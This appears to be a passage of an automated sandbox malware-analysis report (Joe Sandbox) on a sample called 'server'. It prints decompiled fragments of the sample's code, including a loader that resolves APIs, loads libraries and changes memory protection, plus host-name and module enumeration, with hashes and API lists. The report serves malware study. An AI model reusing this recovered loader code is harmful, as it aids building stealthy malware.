                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: c10a2713654771eb0bd7a987401292d0c2220b1112f0d41e8536342dc8319bef
                • Instruction ID: fc7f40ba172b9c1aea5c5b4e9885c8aac40c2c93b7aea02397bdcc4ab3fd881e
                • Opcode Fuzzy Hash: c10a2713654771eb0bd7a987401292d0c2220b1112f0d41e8536342dc8319bef
                • Instruction Fuzzy Hash: FF01B1717203667EEB204AAACD48FA77B8EEBC5254F041011B949CF296D6B2C855C660
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0222790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                				void* _v8;
                				void* __esi;
                				intOrPtr* _t35;
                				void* _t40;
                				intOrPtr* _t41;
                				intOrPtr* _t43;
                				intOrPtr* _t45;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				void* _t54;
                				intOrPtr* _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t61;
                				intOrPtr* _t65;
                				intOrPtr _t68;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                
                				_t55 = _a4;
                				_t35 =  *((intOrPtr*)(_t55 + 4));
                				_a4 = 0;
                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                				if(_t76 < 0) {
                					L18:
                					return _t76;
                				}
                				_t40 = E02224358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                				_t76 = _t40;
                				if(_t76 >= 0) {
                					_t61 = _a28;
                					if(_t61 != 0 &&  *_t61 != 0) {
                						_t52 = _v8;
                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                					}
                					if(_t76 >= 0) {
                						_t43 =  *_t55;
                						_t68 =  *0x222a348; // 0x9ad5a8
                						_t20 = _t68 + 0x222b270; // 0x740053
                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                						if(_t76 >= 0) {
                							_t76 = E02224984(_a4);
                							if(_t76 >= 0) {
                								_t65 = _a28;
                								if(_t65 != 0 &&  *_t65 == 0) {
                									_t50 = _a4;
                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                								}
                							}
                						}
                						_t45 = _a4;
                						if(_t45 != 0) {
                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                						}
                						_t57 = __imp__#6;
                						if(_a20 != 0) {
                							 *_t57(_a20);
                						}
                						if(_a12 != 0) {
                							 *_t57(_a12);
                						}
                					}
                				}
                				_t41 = _v8;
                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                				goto L18;
                			}





















                0x02227911
                0x02227914
                0x02227924
                0x0222792d
                0x02227931
                0x022279ff
                0x02227a05
                0x02227a05
                0x0222794b
                0x02227950
                0x02227954
                0x0222795a
                0x0222795f
                0x02227966
                0x02227975
                0x02227975
                0x02227979
                0x0222797b
                0x02227987
                0x02227992
                0x0222799d
                0x022279a1
                0x022279ab
                0x022279af
                0x022279b1
                0x022279b6
                0x022279bd
                0x022279cd
                0x022279cd
                0x022279b6
                0x022279af
                0x022279cf
                0x022279d4
                0x022279d9
                0x022279d9
                0x022279dc
                0x022279e5
                0x022279ea
                0x022279ea
                0x022279ef
                0x022279f4
                0x022279f4
                0x022279ef
                0x02227979
                0x022279f6
                0x022279fc
                0x00000000

                APIs
                  • Part of subcall function 02224358: SysAllocString.OLEAUT32(80000002), ref: 022243B5
                  • Part of subcall function 02224358: SysFreeString.OLEAUT32(00000000), ref: 0222441B
                • SysFreeString.OLEAUT32(?), ref: 022279EA
                • SysFreeString.OLEAUT32(02224D42), ref: 022279F4
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: aa6bcfa34ef56a09cb24cfa3057b10a1a4da83518ac65b26e3cd8810e4434d99
                • Instruction ID: 56e207d159377fbf8bc415a3bb769759c2b8776759ea6f77ff8b1643f9a2e3d9
                • Opcode Fuzzy Hash: aa6bcfa34ef56a09cb24cfa3057b10a1a4da83518ac65b26e3cd8810e4434d99
                • Instruction Fuzzy Hash: 54314C72500259BFCB21DFA8C888C9BBB7AFB8D7447144658F805AB214D7329D55CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040139F() {
                				char _v16;
                				intOrPtr _v28;
                				void _v32;
                				void* _v36;
                				intOrPtr _t15;
                				void* _t16;
                				void* _t24;
                				long _t25;
                				int _t26;
                				void* _t30;
                				intOrPtr* _t32;
                				signed int _t35;
                				intOrPtr _t38;
                
                				_t15 =  *0x404184;
                				if( *0x40416c > 5) {
                					_t16 = _t15 + 0x40513c;
                				} else {
                					_t16 = _t15 + 0x40529c;
                				}
                				E00401D3C(_t16, _t16);
                				_t35 = 6;
                				memset( &_v32, 0, _t35 << 2);
                				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
                				if(_t24 == 0) {
                					_t25 = 0xb;
                				} else {
                					_t26 = lstrlenW( *0x404178);
                					_t8 = _t26 + 2; // 0x2
                					_t11 = _t26 + _t8 + 8; // 0xa
                					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
                					if(_t30 == 0) {
                						_t32 = _v36;
                						 *_t32 = 0;
                						if( *0x404178 == 0) {
                							 *((short*)(_t32 + 4)) = 0;
                						} else {
                							L00401FE6(_t32 + 4);
                						}
                					}
                					_t25 = E004012FB(_v28); // executed
                				}
                				ExitThread(_t25);
                			}
















                0x004013a5
                0x004013b6
                0x004013c0
                0x004013b8
                0x004013b8
                0x004013b8
                0x004013c7
                0x004013d0
                0x004013d5
                0x004013ec
                0x004013f3
                0x00401450
                0x004013f5
                0x004013fb
                0x00401401
                0x0040140f
                0x00401413
                0x0040141a
                0x00401422
                0x00401426
                0x0040142e
                0x0040143f
                0x00401430
                0x00401436
                0x00401436
                0x0040142e
                0x00401447
                0x00401447
                0x00401452

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ExitThreadlstrlen
                • String ID:
                • API String ID: 2636182767-0
                • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071B57D
                • Module32First.KERNEL32(00000000,00000224), ref: 0071B59D
                Memory Dump Source
                • Source File: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, Offset: 00716000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_716000_server.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: db51e9fa5892a121b410347c5c128366f9a2de17e4a45ef98b22b97577e8d7f5
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 01F0C235600310ABD7202BBCA88CAAE76EDAF48724F100528E642910C0DB78ED958A60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0222472F(void* __ecx) {
                				signed int _v8;
                				void* _t15;
                				void* _t19;
                				void* _t20;
                				void* _t22;
                				intOrPtr* _t23;
                
                				_t23 = __imp__;
                				_t20 = 0;
                				_v8 = _v8 & 0;
                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                				_t10 = _v8;
                				if(_v8 != 0) {
                					_t20 = E022233DC(_t10 + 1);
                					if(_t20 != 0) {
                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                						if(_t15 != 0) {
                							 *((char*)(_v8 + _t20)) = 0;
                						} else {
                							E022261DA(_t20);
                							_t20 = 0;
                						}
                					}
                				}
                				return _t20;
                			}









                0x02224734
                0x0222473f
                0x02224741
                0x02224747
                0x02224749
                0x0222474e
                0x02224757
                0x0222475b
                0x02224764
                0x02224768
                0x02224777
                0x0222476a
                0x0222476b
                0x02224770
                0x02224770
                0x02224768
                0x0222475b
                0x02224780

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,02223DCD,00000000,00000000,?,7491C740,02223DCD), ref: 02224747
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetComputerNameExA.KERNELBASE(00000003,00000000,02223DCD,02223DCE,?,7491C740,02223DCD), ref: 02224764
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 55a5d8c7f4c2f964d934b9cef7afed024d8d3f9dfb2c6af5f52d2c02cf9d03e2
                • Instruction ID: 7c3cbd055cbc8e5eeacad93eaf6fdb14285b556a8e68846cd58b19f6c998cb0e
                • Opcode Fuzzy Hash: 55a5d8c7f4c2f964d934b9cef7afed024d8d3f9dfb2c6af5f52d2c02cf9d03e2
                • Instruction Fuzzy Hash: 19F0B436A2022AFAEB11E6EA8C00EEF36BDDBC5644F110065B914D3144EB71DB09C670
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02225006(signed int __edx, intOrPtr _a4) {
                				void* _t3;
                				void* _t5;
                				void* _t7;
                				void* _t8;
                				void* _t9;
                				signed int _t10;
                
                				_t10 = __edx;
                				_t3 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x222a2d8 = _t3;
                				if(_t3 == 0) {
                					_t8 = 8;
                					return _t8;
                				}
                				 *0x222a1c8 = GetTickCount();
                				_t5 = E022254D8(_a4);
                				if(_t5 == 0) {
                					_t5 = E0222213E(_t9, _a4); // executed
                					if(_t5 == 0) {
                						if(E02226392(_t9) != 0) {
                							 *0x222a300 = 1; // executed
                						}
                						_t7 = E02222523(_t10); // executed
                						return _t7;
                					}
                				}
                				return _t5;
                			}









                0x02225006
                0x0222500f
                0x02225015
                0x0222501c
                0x02225020
                0x00000000
                0x02225020
                0x0222502d
                0x02225032
                0x02225039
                0x0222503f
                0x02225046
                0x0222504f
                0x02225051
                0x02225051
                0x0222505b
                0x00000000
                0x0222505b
                0x02225046
                0x02225060

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,0222107E,?), ref: 0222500F
                • GetTickCount.KERNEL32 ref: 02225023
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: 34984ab29eb2dfe091d43659b19fe3b02a0d72c2a320c722306bf6945cecaf39
                • Instruction ID: 3921283337fca93bd59ac360036f45cbb26201b2c06be0e786044eb1c4c6240f
                • Opcode Fuzzy Hash: 34984ab29eb2dfe091d43659b19fe3b02a0d72c2a320c722306bf6945cecaf39
                • Instruction Fuzzy Hash: C0F06D30AA0336FADB352BF0AD19B2535D56B08B04FA0C925E901D8098EBB3D57C9E61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNELBASE(00000400,?,?,00500223,?,?), ref: 00500E19
                • SetErrorMode.KERNELBASE(00000000,?,?,00500223,?,?), ref: 00500E1E
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                • Instruction ID: 0d446c16eae7c208faf0d57bd6344f7191849366e1e2b515b91accd1c8e4ec86
                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                • Instruction Fuzzy Hash: C6D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DE90C0C770994046E5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 34%
                			E02222839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v12;
                				void* _v18;
                				char _v20;
                				intOrPtr _t15;
                				void* _t17;
                				intOrPtr _t19;
                				void* _t23;
                
                				_v20 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t15 =  *0x222a348; // 0x9ad5a8
                				_t4 = _t15 + 0x222b3e8; // 0x2bd8990
                				_t20 = _t4;
                				_t6 = _t15 + 0x222b174; // 0x650047
                				_t17 = E0222790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                				if(_t17 < 0) {
                					_t23 = _t17;
                				} else {
                					_t23 = 8;
                					if(_v20 != _t23) {
                						_t23 = 1;
                					} else {
                						_t19 = E0222661C(_t20, _v12);
                						if(_t19 != 0) {
                							 *_a16 = _t19;
                							_t23 = 0;
                						}
                						__imp__#6(_v12);
                					}
                				}
                				return _t23;
                			}










                0x02222843
                0x0222284a
                0x0222284b
                0x0222284c
                0x0222284d
                0x02222853
                0x02222858
                0x02222858
                0x02222862
                0x02222874
                0x0222287b
                0x022228a9
                0x0222287d
                0x0222287f
                0x02222884
                0x022228a6
                0x02222886
                0x02222889
                0x02222890
                0x02222895
                0x02222897
                0x02222897
                0x0222289c
                0x0222289c
                0x02222884
                0x022228b0

                APIs
                  • Part of subcall function 0222790B: SysFreeString.OLEAUT32(?), ref: 022279EA
                  • Part of subcall function 0222661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02224B72,004F0053,00000000,?), ref: 02226625
                  • Part of subcall function 0222661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02224B72,004F0053,00000000,?), ref: 0222664F
                  • Part of subcall function 0222661C: memset.NTDLL ref: 02226663
                • SysFreeString.OLEAUT32(00000000), ref: 0222289C
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: 7b299467c1191aa44f5753ce3dc9cfb7aa030f959e0af23ba158f211b26fedf4
                • Instruction ID: 6021a40ccc2a5895fed316193ac23a39e746310158aecccf12be605bb251a838
                • Opcode Fuzzy Hash: 7b299467c1191aa44f5753ce3dc9cfb7aa030f959e0af23ba158f211b26fedf4
                • Instruction Fuzzy Hash: CA019E32920229FFDB219FE4CC04AAABBB9EF04344F410525ED01A7160E773D919C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00401D3C(void* __eax, intOrPtr _a4) {
                
                				 *0x404190 =  *0x404190 & 0x00000000;
                				_push(0);
                				_push(0x40418c);
                				_push(1);
                				_push(_a4);
                				 *0x404188 = 0xc; // executed
                				L00401682(); // executed
                				return __eax;
                			}



                0x00401d3c
                0x00401d43
                0x00401d45
                0x00401d4a
                0x00401d4c
                0x00401d50
                0x00401d5a
                0x00401d5f

                APIs
                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: DescriptorSecurity$ConvertString
                • String ID:
                • API String ID: 3907675253-0
                • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E022261DA(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x222a2d8, 0, _a4); // executed
                				return _t2;
                			}




                0x022261e6
                0x022261ec

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 5a538a9449121d03c4a82c7d43f89ec9cd0ae56e07593fc6e9e70b1652a9e2d0
                • Instruction ID: 932ecd7694f3834ecaa1a11aa556e8dfaa29136ac9067949727c603e9eb1bd26
                • Opcode Fuzzy Hash: 5a538a9449121d03c4a82c7d43f89ec9cd0ae56e07593fc6e9e70b1652a9e2d0
                • Instruction Fuzzy Hash: 1DB01271980200BBCB314B80FE0CF057A21A750B00F225911B3080007082730474FF15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004012E6(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
                				return _t2;
                			}




                0x004012f2
                0x004012f8

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
                • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401BA9(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
                				return _t2;
                			}




                0x00401bb5
                0x00401bbb

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
                • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
                • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E004012FB(void* __eax) {
                				char _v8;
                				void* _v12;
                				void* __edi;
                				void* _t18;
                				long _t24;
                				long _t26;
                				long _t29;
                				intOrPtr _t40;
                				void* _t41;
                				void* _t42;
                				void* _t44;
                
                				_t41 = __eax;
                				_t16 =  *0x404180;
                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                				if(_t18 != 0) {
                					_t29 = 8;
                					goto L8;
                				} else {
                					_t40 = _v8;
                					_t29 = E00401BC4(_t33, _t40, _t41);
                					if(_t29 == 0) {
                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                						_t24 = E00401000(_t40, _t44); // executed
                						_t29 = _t24;
                						if(_t29 == 0) {
                							_t26 = E004014CF(_t44, _t40); // executed
                							_t29 = _t26;
                							if(_t29 == 0) {
                								_push(_t26);
                								_push(1);
                								_push(_t40);
                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                									_t29 = GetLastError();
                								}
                							}
                						}
                					}
                					_t42 = _v12;
                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                					E00401BA9(_t42);
                					L8:
                					return _t29;
                				}
                			}














                0x00401303
                0x00401305
                0x00401321
                0x00401332
                0x00401339
                0x00401397
                0x00000000
                0x0040133b
                0x0040133b
                0x00401345
                0x00401349
                0x0040134e
                0x00401351
                0x00401356
                0x0040135a
                0x0040135f
                0x00401364
                0x00401368
                0x0040136d
                0x0040136e
                0x00401372
                0x00401377
                0x0040137f
                0x0040137f
                0x00401377
                0x00401368
                0x0040135a
                0x00401381
                0x0040138a
                0x0040138e
                0x00401398
                0x0040139e
                0x0040139e

                APIs
                  • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                  • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                  • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                  • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                  • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
                  • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                • GetLastError.KERNEL32(?,?), ref: 00401379
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                • String ID:
                • API String ID: 3135819546-0
                • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0071B265
                Memory Dump Source
